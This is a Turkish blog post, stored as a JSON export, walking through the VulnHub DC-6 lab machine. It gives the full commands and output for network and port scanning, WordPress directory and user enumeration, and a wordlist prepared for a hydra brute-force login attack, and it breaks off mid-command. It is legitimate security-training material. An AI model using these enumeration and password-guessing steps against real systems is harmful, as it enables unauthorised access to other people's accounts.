{"id":1237,"date":"2021-06-23T21:34:38","date_gmt":"2021-06-23T21:34:38","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1237"},"modified":"2021-06-23T21:34:38","modified_gmt":"2021-06-23T21:34:38","slug":"dc-6","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/06\/23\/dc-6\/","title":{"rendered":"DC: 6"},"content":{"rendered":"<h2>Makine Hakk\u0131nda Bilgiler<\/h2>\n<p><strong>A\u00e7\u0131klama:<\/strong><br \/>\nNOTE: You WILL need to edit your hosts file on your pentesting device so that it reads something like:<br \/>\n192.168.0.142 wordy<\/p>\n<p>cat \/usr\/share\/wordlists\/rockyou.txt | grep k01 &gt; passwords.txt That should save you a few years. \ud83d\ude09<\/p>\n<p><strong>Vulnhub Sayfas\u0131:<\/strong><br \/>\n<a href=\"https:\/\/www.vulnhub.com\/entry\/dc-6,315\/\">https:\/\/www.vulnhub.com\/entry\/dc-6,315\/<\/a><\/p>\n<p><strong>\u0130ndirme Sayfas\u0131:<\/strong><br \/>\n<a href=\"https:\/\/download.vulnhub.com\/dc\/DC-6.zip\">https:\/\/download.vulnhub.com\/dc\/DC-6.zip<\/a><\/p>\n<h2>Walkthrough<\/h2>\n<p>Makineyi tespit ederek ba\u015flayal\u0131m.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/dc6]\n\u2514\u2500# arp-scan -l | grep e9:70\n192.168.31.109  08:00:27:be:e9:70   PCS Systemtechnik GmbH\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/dc6]\n\u2514\u2500# ifconfig eth0\neth0: flags=4163&lt;UP,BROADCAST,RUNNING,MULTICAST&gt;  mtu 1500\n        inet 192.168.31.102  netmask 255.255.255.0  broadcast 192.168.31.255\n        inet6 fe80::a00:27ff:fef2:f7d9  prefixlen 64  scopeid 0x20&lt;link&gt;\n        ether 08:00:27:f2:f7:d9  txqueuelen 1000  (Ethernet)\n        RX packets 13815880  bytes 6905793614 (6.4 GiB)\n        RX errors 210  dropped 0  overruns 0  frame 210\n        TX packets 17224651  bytes 2538449611 (2.3 GiB)\n        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0\n<\/code><\/pre>\n<p>Daha sonras\u0131nda nmap taramas\u0131 ile devam edelim.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/dc6]\n\u2514\u2500# nmap 192.168.31.109 -p- -A -T4    \nStarting Nmap 7.91 ( https:\/\/nmap.org ) at 2021-06-23 14:56 EDT\nNmap scan report for dc-6 (192.168.31.109)\nHost is up (0.00071s latency).\nNot shown: 65533 closed ports\nPORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)\n| ssh-hostkey: \n|   2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)\n|   256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)\n|_  256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)\n80\/tcp open  http    Apache httpd 2.4.25 ((Debian))\n|_http-server-header: Apache\/2.4.25 (Debian)\n|_http-title: Did not follow redirect to http:\/\/wordy\/\nMAC Address: 08:00:27:BE:E9:70 (Oracle VirtualBox virtual NIC)\nDevice type: general purpose\nRunning: Linux 3.X|4.X\nOS CPE: cpe:\/o:linux:linux_kernel:3 cpe:\/o:linux:linux_kernel:4\nOS details: Linux 3.2 - 4.9\nNetwork Distance: 1 hop\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE\nHOP RTT     ADDRESS\n1   0.71 ms dc-6 (192.168.31.109)\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 10.53 seconds\n<\/code><\/pre>\n<p>Vallahi en sevdi\u011fim senaryo, olay \u00e7ok belli. http ile i\u00e7eris\u0131z ssh ile devam et...<br \/>\nBiraz sayfay\u0131 inceledim ve wordpress oldu\u011funu g\u00f6rd\u00fcm. Ekstra bir adres var m\u0131 diye gobuster ile kontrol ettim.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/dc6]\n\u2514\u2500# gobuster dir --discover-backup --extensions txt,php,php5,backup,log,sql,html --follow-redirect --url http:\/\/192.168.31.109\/ --wordlist \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt --status-codes-blacklist 404,403\n===============================================================\nGobuster v3.1.0\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.31.109\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   403,404\n[+] User Agent:              gobuster\/3.1.0\n[+] Extensions:              php,php5,backup,log,sql,html,txt\n[+] Follow Redirect:         true\n[+] Timeout:                 10s\n===============================================================\n2021\/06\/23 14:59:39 Starting gobuster in directory enumeration mode\n===============================================================\n\/index.php            (Status: 200) [Size: 53227]\n\/wp-content           (Status: 200) [Size: 0]    \n\/wp-login.php         (Status: 200) [Size: 2808] \n\/license.txt          (Status: 200) [Size: 19935]\n\/wp-includes          (Status: 200) [Size: 42579]\n\/readme.html          (Status: 200) [Size: 7425] \n\/wp-trackback.php     (Status: 200) [Size: 135]  \n\/wp-admin             (Status: 200) [Size: 2817] \n\/xmlrpc.php           (Status: 405) [Size: 42]   \n\/wp-signup.php        (Status: 200) [Size: 2950] \n\n===============================================================\n2021\/06\/23 15:39:59 Finished\n===============================================================\n<\/code><\/pre>\n<p>wpscan ile devam edelim.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/dc6]\n\u2514\u2500# wpscan --url http:\/\/wordy -e vp,vt,cb,u --api-token **********************                                                                                                                                       4 \u2a2f\n_______________________________________________________________\n         __          _______   _____\n         \\ \\        \/ \/  __ \\ \/ ____|\n          \\ \\  \/\\  \/ \/| |__) | (___   ___  __ _ _ __ \u00ae\n           \\ \\\/  \\\/ \/ |  ___\/ \\___ \\ \/ __|\/ _` | &#039;_ \\\n            \\  \/\\  \/  | |     ____) | (__| (_| | | | |\n             \\\/  \\\/   |_|    |_____\/ \\___|\\__,_|_| |_|\n\n         WordPress Security Scanner by the WPScan Team\n                         Version 3.8.17\n       Sponsored by Automattic - https:\/\/automattic.com\/\n       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart\n_______________________________________________________________\n\n[+] URL: http:\/\/wordy\/ [192.168.31.109]\n[+] Started: Wed Jun 23 15:06:23 2021\n\nInteresting Finding(s):\n\n[+] Headers\n | Interesting Entry: Server: Apache\/2.4.25 (Debian)\n | Found By: Headers (Passive Detection)\n | Confidence: 100%\n\n[+] XML-RPC seems to be enabled: http:\/\/wordy\/xmlrpc.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n | References:\n |  - http:\/\/codex.wordpress.org\/XML-RPC_Pingback_API\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_ghost_scanner\/\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/dos\/http\/wordpress_xmlrpc_dos\/\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_xmlrpc_login\/\n |  - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_pingback_access\/\n\n[+] WordPress readme found: http:\/\/wordy\/readme.html\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n\n[+] The external WP-Cron seems to be enabled: http:\/\/wordy\/wp-cron.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 60%\n | References:\n |  - https:\/\/www.iplocation.net\/defend-wordpress-from-ddos\n |  - https:\/\/github.com\/wpscanteam\/wpscan\/issues\/1299\n\n[+] WordPress version 5.1.1 identified (Insecure, released on 2019-03-13).\n | Found By: Rss Generator (Passive Detection)\n |  - http:\/\/wordy\/index.php\/feed\/, &lt;generator&gt;https:\/\/wordpress.org\/?v=5.1.1&lt;\/generator&gt;\n |  - http:\/\/wordy\/index.php\/comments\/feed\/, &lt;generator&gt;https:\/\/wordpress.org\/?v=5.1.1&lt;\/generator&gt;\n |\n | [!] 26 vulnerabilities identified:\n |\n | [!] Title: WordPress &lt;= 5.2.2 - Cross-Site Scripting (XSS) in URL Sanitisation\n |     Fixed in: 5.1.2\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/4494a903-5a73-4cad-8c14-1e7b4da2be61\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-16222\n |      - https:\/\/wordpress.org\/news\/2019\/09\/wordpress-5-2-3-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/30ac67579559fe42251b5a9f887211bf61a8ed68\n |      - https:\/\/hackerone.com\/reports\/339483\n |\n | [!] Title: WordPress 5.0-5.2.2 - Authenticated Stored XSS in Shortcode Previews\n |     Fixed in: 5.1.2\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/8aca2325-14b8-4b9d-94bd-d20b2c3b0c77\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-16219\n |      - https:\/\/wordpress.org\/news\/2019\/09\/wordpress-5-2-3-security-and-maintenance-release\/\n |      - https:\/\/fortiguard.com\/zeroday\/FG-VD-18-165\n |      - https:\/\/www.fortinet.com\/blog\/threat-research\/wordpress-core-stored-xss-vulnerability.html\n |\n | [!] Title: WordPress &lt;= 5.2.3 - Stored XSS in Customizer\n |     Fixed in: 5.1.3\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/d39a7b84-28b9-4916-a2fc-6192ceb6fa56\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-17674\n |      - https:\/\/wordpress.org\/news\/2019\/10\/wordpress-5-2-4-security-release\/\n |      - https:\/\/blog.wpscan.com\/wordpress\/security\/release\/2019\/10\/15\/wordpress-524-security-release-breakdown.html\n |\n | [!] Title: WordPress &lt;= 5.2.3 - Unauthenticated View Private\/Draft Posts\n |     Fixed in: 5.1.3\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/3413b879-785f-4c9f-aa8a-5a4a1d5e0ba2\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-17671\n |      - https:\/\/wordpress.org\/news\/2019\/10\/wordpress-5-2-4-security-release\/\n |      - https:\/\/blog.wpscan.com\/wordpress\/security\/release\/2019\/10\/15\/wordpress-524-security-release-breakdown.html\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/f82ed753cf00329a5e41f2cb6dc521085136f308\n |      - https:\/\/0day.work\/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts\/\n |\n | [!] Title: WordPress &lt;= 5.2.3 - Stored XSS in Style Tags\n |     Fixed in: 5.1.3\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/d005b1f8-749d-438a-8818-21fba45c6465\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-17672\n |      - https:\/\/wordpress.org\/news\/2019\/10\/wordpress-5-2-4-security-release\/\n |      - https:\/\/blog.wpscan.com\/wordpress\/security\/release\/2019\/10\/15\/wordpress-524-security-release-breakdown.html\n |\n | [!] Title: WordPress &lt;= 5.2.3 - JSON Request Cache Poisoning\n |     Fixed in: 5.1.3\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/7804d8ed-457a-407e-83a7-345d3bbe07b2\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-17673\n |      - https:\/\/wordpress.org\/news\/2019\/10\/wordpress-5-2-4-security-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/b224c251adfa16a5f84074a3c0886270c9df38de\n |      - https:\/\/blog.wpscan.com\/wordpress\/security\/release\/2019\/10\/15\/wordpress-524-security-release-breakdown.html\n |\n | [!] Title: WordPress &lt;= 5.2.3 - Server-Side Request Forgery (SSRF) in URL Validation \n |     Fixed in: 5.1.3\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/26a26de2-d598-405d-b00c-61f71cfacff6\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-17669\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-17670\n |      - https:\/\/wordpress.org\/news\/2019\/10\/wordpress-5-2-4-security-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/9db44754b9e4044690a6c32fd74b9d5fe26b07b2\n |      - https:\/\/blog.wpscan.com\/wordpress\/security\/release\/2019\/10\/15\/wordpress-524-security-release-breakdown.html\n |\n | [!] Title: WordPress &lt;= 5.2.3 - Admin Referrer Validation\n |     Fixed in: 5.1.3\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/715c00e3-5302-44ad-b914-131c162c3f71\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-17675\n |      - https:\/\/wordpress.org\/news\/2019\/10\/wordpress-5-2-4-security-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/b183fd1cca0b44a92f0264823dd9f22d2fd8b8d0\n |      - https:\/\/blog.wpscan.com\/wordpress\/security\/release\/2019\/10\/15\/wordpress-524-security-release-breakdown.html\n |\n | [!] Title: WordPress &lt;= 5.3 - Authenticated Improper Access Controls in REST API\n |     Fixed in: 5.1.4\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/4a6de154-5fbd-4c80-acd3-8902ee431bd8\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-20043\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-16788\n |      - https:\/\/wordpress.org\/news\/2019\/12\/wordpress-5-3-1-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/security\/advisories\/GHSA-g7rg-hchx-c2gw\n |\n | [!] Title: WordPress &lt;= 5.3 - Authenticated Stored XSS via Crafted Links\n |     Fixed in: 5.1.4\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/23553517-34e3-40a9-a406-f3ffbe9dd265\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-16773\n |      - https:\/\/wordpress.org\/news\/2019\/12\/wordpress-5-3-1-security-and-maintenance-release\/\n |      - https:\/\/hackerone.com\/reports\/509930\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/commit\/1f7f3f1f59567e2504f0fbebd51ccf004b3ccb1d\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/security\/advisories\/GHSA-xvg2-m2f4-83m7\n |\n | [!] Title: WordPress &lt;= 5.3 - Authenticated Stored XSS via Block Editor Content\n |     Fixed in: 5.1.4\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/be794159-4486-4ae1-a5cc-5c190e5ddf5f\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-16781\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-16780\n |      - https:\/\/wordpress.org\/news\/2019\/12\/wordpress-5-3-1-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/security\/advisories\/GHSA-pg4x-64rh-3c9v\n |\n | [!] Title: WordPress &lt;= 5.3 - wp_kses_bad_protocol() Colon Bypass\n |     Fixed in: 5.1.4\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/8fac612b-95d2-477a-a7d6-e5ec0bb9ca52\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2019-20041\n |      - https:\/\/wordpress.org\/news\/2019\/12\/wordpress-5-3-1-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/commit\/b1975463dd995da19bb40d3fa0786498717e3c53\n |\n | [!] Title: WordPress &lt; 5.4.1 - Password Reset Tokens Failed to Be Properly Invalidated\n |     Fixed in: 5.1.5\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/7db191c0-d112-4f08-a419-a1cd81928c4e\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-11027\n |      - https:\/\/wordpress.org\/news\/2020\/04\/wordpress-5-4-1\/\n |      - https:\/\/core.trac.wordpress.org\/changeset\/47634\/\n |      - https:\/\/www.wordfence.com\/blog\/2020\/04\/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update\/\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/security\/advisories\/GHSA-ww7v-jg8c-q6jw\n |\n | [!] Title: WordPress &lt; 5.4.1 - Unauthenticated Users View Private Posts\n |     Fixed in: 5.1.5\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/d1e1ba25-98c9-4ae7-8027-9632fb825a56\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-11028\n |      - https:\/\/wordpress.org\/news\/2020\/04\/wordpress-5-4-1\/\n |      - https:\/\/core.trac.wordpress.org\/changeset\/47635\/\n |      - https:\/\/www.wordfence.com\/blog\/2020\/04\/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update\/\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/security\/advisories\/GHSA-xhx9-759f-6p2w\n |\n | [!] Title: WordPress &lt; 5.4.1 - Authenticated Cross-Site Scripting (XSS) in Customizer\n |     Fixed in: 5.1.5\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/4eee26bd-a27e-4509-a3a5-8019dd48e429\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-11025\n |      - https:\/\/wordpress.org\/news\/2020\/04\/wordpress-5-4-1\/\n |      - https:\/\/core.trac.wordpress.org\/changeset\/47633\/\n |      - https:\/\/www.wordfence.com\/blog\/2020\/04\/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update\/\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/security\/advisories\/GHSA-4mhg-j6fx-5g3c\n |\n | [!] Title: WordPress &lt; 5.4.1 - Cross-Site Scripting (XSS) in wp-object-cache\n |     Fixed in: 5.1.5\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/e721d8b9-a38f-44ac-8520-b4a9ed6a5157\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-11029\n |      - https:\/\/wordpress.org\/news\/2020\/04\/wordpress-5-4-1\/\n |      - https:\/\/core.trac.wordpress.org\/changeset\/47637\/\n |      - https:\/\/www.wordfence.com\/blog\/2020\/04\/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update\/\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/security\/advisories\/GHSA-568w-8m88-8g2c\n |\n | [!] Title: WordPress &lt; 5.4.1 - Authenticated Cross-Site Scripting (XSS) in File Uploads\n |     Fixed in: 5.1.5\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/55438b63-5fc9-4812-afc4-2f1eff800d5f\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-11026\n |      - https:\/\/wordpress.org\/news\/2020\/04\/wordpress-5-4-1\/\n |      - https:\/\/core.trac.wordpress.org\/changeset\/47638\/\n |      - https:\/\/www.wordfence.com\/blog\/2020\/04\/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update\/\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/security\/advisories\/GHSA-3gw2-4656-pfr2\n |      - https:\/\/hackerone.com\/reports\/179695\n |\n | [!] Title: WordPress &lt;= 5.2.3 - Hardening Bypass\n |     Fixed in: 5.1.3\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/378d7df5-bce2-406a-86b2-ff79cd699920\n |      - https:\/\/blog.ripstech.com\/2020\/wordpress-hardening-bypass\/\n |      - https:\/\/hackerone.com\/reports\/436928\n |      - https:\/\/wordpress.org\/news\/2019\/11\/wordpress-5-2-4-update\/\n |\n | [!] Title: WordPress &lt; 5.4.2 - Authenticated XSS in Block Editor\n |     Fixed in: 5.1.6\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/831e4a94-239c-4061-b66e-f5ca0dbb84fa\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-4046\n |      - https:\/\/wordpress.org\/news\/2020\/06\/wordpress-5-4-2-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/security\/advisories\/GHSA-rpwf-hrh2-39jf\n |      - https:\/\/pentest.co.uk\/labs\/research\/subtle-stored-xss-wordpress-core\/\n |      - https:\/\/www.youtube.com\/watch?v=tCh7Y8z8fb4\n |\n | [!] Title: WordPress &lt; 5.4.2 - Authenticated XSS via Media Files\n |     Fixed in: 5.1.6\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/741d07d1-2476-430a-b82f-e1228a9343a4\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-4047\n |      - https:\/\/wordpress.org\/news\/2020\/06\/wordpress-5-4-2-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/security\/advisories\/GHSA-8q2w-5m27-wm27\n |\n | [!] Title: WordPress &lt; 5.4.2 - Open Redirection\n |     Fixed in: 5.1.6\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/12855f02-432e-4484-af09-7d0fbf596909\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-4048\n |      - https:\/\/wordpress.org\/news\/2020\/06\/wordpress-5-4-2-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/10e2a50c523cf0b9785555a688d7d36a40fbeccf\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/security\/advisories\/GHSA-q6pw-gvf4-5fj5\n |\n | [!] Title: WordPress &lt; 5.4.2 - Authenticated Stored XSS via Theme Upload\n |     Fixed in: 5.1.6\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/d8addb42-e70b-4439-b828-fd0697e5d9d4\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-4049\n |      - https:\/\/www.exploit-db.com\/exploits\/48770\/\n |      - https:\/\/wordpress.org\/news\/2020\/06\/wordpress-5-4-2-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/security\/advisories\/GHSA-87h4-phjv-rm6p\n |      - https:\/\/hackerone.com\/reports\/406289\n |\n | [!] Title: WordPress &lt; 5.4.2 - Misuse of set-screen-option Leading to Privilege Escalation\n |     Fixed in: 5.1.6\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/b6f69ff1-4c11-48d2-b512-c65168988c45\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-4050\n |      - https:\/\/wordpress.org\/news\/2020\/06\/wordpress-5-4-2-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/dda0ccdd18f6532481406cabede19ae2ed1f575d\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/security\/advisories\/GHSA-4vpv-fgg2-gcqc\n |\n | [!] Title: WordPress &lt; 5.4.2 - Disclosure of Password-Protected Page\/Post Comments\n |     Fixed in: 5.1.6\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/eea6dbf5-e298-44a7-9b0d-f078ad4741f9\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-25286\n |      - https:\/\/wordpress.org\/news\/2020\/06\/wordpress-5-4-2-security-and-maintenance-release\/\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/c075eec24f2f3214ab0d0fb0120a23082e6b1122\n |\n | [!] Title: WordPress 4.7-5.7 - Authenticated Password Protected Pages Exposure\n |     Fixed in: 5.1.9\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/6a3ec618-c79e-4b9c-9020-86b157458ac5\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2021-29450\n |      - https:\/\/wordpress.org\/news\/2021\/04\/wordpress-5-7-1-security-and-maintenance-release\/\n |      - https:\/\/blog.wpscan.com\/2021\/04\/15\/wordpress-571-security-vulnerability-release.html\n |      - https:\/\/github.com\/WordPress\/wordpress-develop\/security\/advisories\/GHSA-pmmh-2f36-wvhq\n |      - https:\/\/core.trac.wordpress.org\/changeset\/50717\/\n |      - https:\/\/www.youtube.com\/watch?v=J2GXmxAdNWs\n |\n | [!] Title: WordPress 3.7 to 5.7.1 - Object Injection in PHPMailer\n |     Fixed in: 5.1.10\n |     References:\n |      - https:\/\/wpscan.com\/vulnerability\/4cd46653-4470-40ff-8aac-318bee2f998d\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-36326\n |      - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2018-19296\n |      - https:\/\/github.com\/WordPress\/WordPress\/commit\/267061c9595fedd321582d14c21ec9e7da2dcf62\n |      - https:\/\/wordpress.org\/news\/2021\/05\/wordpress-5-7-2-security-release\/\n |      - https:\/\/github.com\/PHPMailer\/PHPMailer\/commit\/e2e07a355ee8ff36aba21d0242c5950c56e4c6f9\n |      - https:\/\/www.wordfence.com\/blog\/2021\/05\/wordpress-5-7-2-security-release-what-you-need-to-know\/\n |      - https:\/\/www.youtube.com\/watch?v=HaW15aMzBUM\n\n[+] WordPress theme in use: twentyseventeen\n | Location: http:\/\/wordy\/wp-content\/themes\/twentyseventeen\/\n | Last Updated: 2021-04-27T00:00:00.000Z\n | Readme: http:\/\/wordy\/wp-content\/themes\/twentyseventeen\/README.txt\n | [!] The version is out of date, the latest version is 2.7\n | Style URL: http:\/\/wordy\/wp-content\/themes\/twentyseventeen\/style.css?ver=5.1.1\n | Style Name: Twenty Seventeen\n | Style URI: https:\/\/wordpress.org\/themes\/twentyseventeen\/\n | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...\n | Author: the WordPress team\n | Author URI: https:\/\/wordpress.org\/\n |\n | Found By: Css Style In Homepage (Passive Detection)\n |\n | Version: 2.1 (80% confidence)\n | Found By: Style (Passive Detection)\n |  - http:\/\/wordy\/wp-content\/themes\/twentyseventeen\/style.css?ver=5.1.1, Match: &#039;Version: 2.1&#039;\n\n[+] Enumerating Vulnerable Plugins (via Passive Methods)\n\n[i] No plugins Found.\n\n[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)\n Checking Known Locations - Time: 00:00:00 &lt;==============================================================================================================================================================&gt; (352 \/ 352) 100.00% Time: 00:00:00\n[+] Checking Theme Versions (via Passive and Aggressive Methods)\n\n[i] No themes Found.\n\n[+] Enumerating Config Backups (via Passive and Aggressive Methods)\n Checking Config Backups - Time: 00:00:00 &lt;===============================================================================================================================================================&gt; (137 \/ 137) 100.00% Time: 00:00:00\n\n[i] No Config Backups Found.\n\n[+] Enumerating Users (via Passive and Aggressive Methods)\n Brute Forcing Author IDs - Time: 00:00:01 &lt;================================================================================================================================================================&gt; (10 \/ 10) 100.00% Time: 00:00:01\n\n[i] User(s) Identified:\n\n[+] admin\n | Found By: Rss Generator (Passive Detection)\n | Confirmed By:\n |  Wp Json Api (Aggressive Detection)\n |   - http:\/\/wordy\/index.php\/wp-json\/wp\/v2\/users\/?per_page=100&amp;page=1\n |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)\n |  Login Error Messages (Aggressive Detection)\n\n[+] graham\n | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)\n | Confirmed By: Login Error Messages (Aggressive Detection)\n\n[+] mark\n | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)\n | Confirmed By: Login Error Messages (Aggressive Detection)\n\n[+] sarah\n | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)\n | Confirmed By: Login Error Messages (Aggressive Detection)\n\n[+] jens\n | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)\n | Confirmed By: Login Error Messages (Aggressive Detection)\n\n[+] WPScan DB API OK\n | Plan: free\n | Requests Done (during the scan): 2\n | Requests Remaining: 23\n\n[+] Finished: Wed Jun 23 15:06:42 2021\n[+] Requests Done: 556\n[+] Cached Requests: 9\n[+] Data Sent: 134.803 KB\n[+] Data Received: 728.813 KB\n[+] Memory used: 258.625 MB\n[+] Elapsed time: 00:00:19\n<\/code><\/pre>\n<p>\u00c7ok g\u00fczel kullan\u0131c\u0131lar\u0131 tespit ettik. Bundan sonras\u0131nda hydra ile kaba kuvvet denedim. Bunu yaparken burp ile proxy yapmay\u0131 ihmal etmiyorum ki sald\u0131r\u0131y\u0131 canl\u0131 takip edebileyim. Ayr\u0131ca makine a\u00e7\u0131klamas\u0131nda rockyou.txt'yi k\u0131saltmam\u0131z s\u00f6ylenmi\u015fti. Bunuda uygulad\u0131m.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/dc6]\n\u2514\u2500# HYDRA_PROXY_HTTP=&quot;http:\/\/127.0.0.1:8080&quot;                                                                                                                                  